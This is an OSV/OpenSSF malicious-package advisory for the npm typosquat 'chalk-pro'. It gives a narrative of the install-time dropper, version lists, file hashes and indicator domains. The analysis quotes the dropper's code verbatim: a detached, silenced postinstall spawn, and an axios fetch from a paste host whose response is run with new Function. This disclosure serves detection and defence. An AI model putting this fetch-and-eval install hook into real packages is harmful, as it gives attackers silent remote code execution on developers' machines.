MAL-2026-5711

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk-pro/MAL-2026-5711.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5711
Published
2026-06-12T20:36:57Z
Modified
2026-06-16T23:16:57.949188211Z
Summary
Malicious code in chalk-pro (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce)

Package is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs node lib/utils/index.js, which uses child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] }) followed by child.unref() to launch lib/utils/smtp-connection/index.js as a detached, fully-silenced child so npm install returns immediately while the dropper continues in the background. The dropper executes require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require)) — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with new Function at install time, with full access to require. A second file (lib/utils/smtp-connection/parse.js) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "7.0.4"
            ],
            "sha256": "ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce",
            "modified_time": "2026-06-12T20:36:57Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006231",
            "import_time": "2026-06-12T20:49:38.118064947Z"
        },
        {
            "versions": [
                "7.0.4"
            ],
            "sha256": "d6015370f610f4d4581119093958e05171cac46e967b97725e8e3ed42dad9070",
            "modified_time": "2026-06-12T20:36:58Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T20:49:38.195698931Z",
            "id": "IN-MAL-2026-006232"
        },
        {
            "versions": [
                "7.0.6"
            ],
            "sha256": "75bcaaf15fbc593bdf034886186f961d37758a21b9feca9c18c37338c8af34dc",
            "modified_time": "2026-06-16T22:17:58Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006840",
            "import_time": "2026-06-16T23:03:43.140780104Z"
        }
    ]
}
References
Credits

Affected packages

npm / chalk-pro

Package

Affected ranges

Affected versions

7.*
7.0.4
7.0.6

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "chalk-pro-7.0.4.tgz",
            "hashes": {
                "sha512_sri": "sha512-m0gHULuyqRGU+Z2ZkyFuCDJD0YUUoENkKlzk5lY1tt97m7zFVP+79dhp4gTNtwyZ0orut7rgi+lEBNGNEWTmbg==",
                "sha1": "fd1014b20c77e2d2b536d8dcef0187a949438318"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "1177ef44c40c048428ad64bebb0781fdf8ec303a3a4941c225efc143a54d0798",
            "path": "lib/utils/smtp-connection/index.js",
            "tlsh": "09e026a223e0612e223519e593060067b007c5616b6ae8c6c3585af226c1fd58e23df9"
        },
        {
            "sha256": "9fb27c30f484650bb4a39f65a03fbccdc0b9b5f1cb84700ca73ee8893c66e06e",
            "path": "lib/utils/index.js",
            "tlsh": "dae0686a23533738a034cbc1da30ce3b258b8020b365a0e0f00c406a2bc72c406ea8da"
        },
        {
            "sha256": "2b849087b5db4e7663811977e549e5cb0a76d2b3d36c1b8e0e845a45e835a6c4",
            "path": "package.json",
            "tlsh": "1041fc15cd268ce3279929edb86d0183b530d00f8d09b85db74c938c4f8e99f76b8a6d"
        },
        {
            "sha256": "4aac106a4f36aba6433c7ded453d724307ee55616e240883cd46204549cf24b1",
            "path": "lib/utils/smtp-connection/parse.js",
            "tlsh": "7cf0a6802cb8fb900345b0e7c0bbeb07a198a068312287a48a8f9d5a45868488a130dd"
        }
    ],
    "domains": [
        "github.com",
        "release-assets.githubusercontent.com",
        "www.jsonkeeper.com"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk-pro/MAL-2026-5711.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]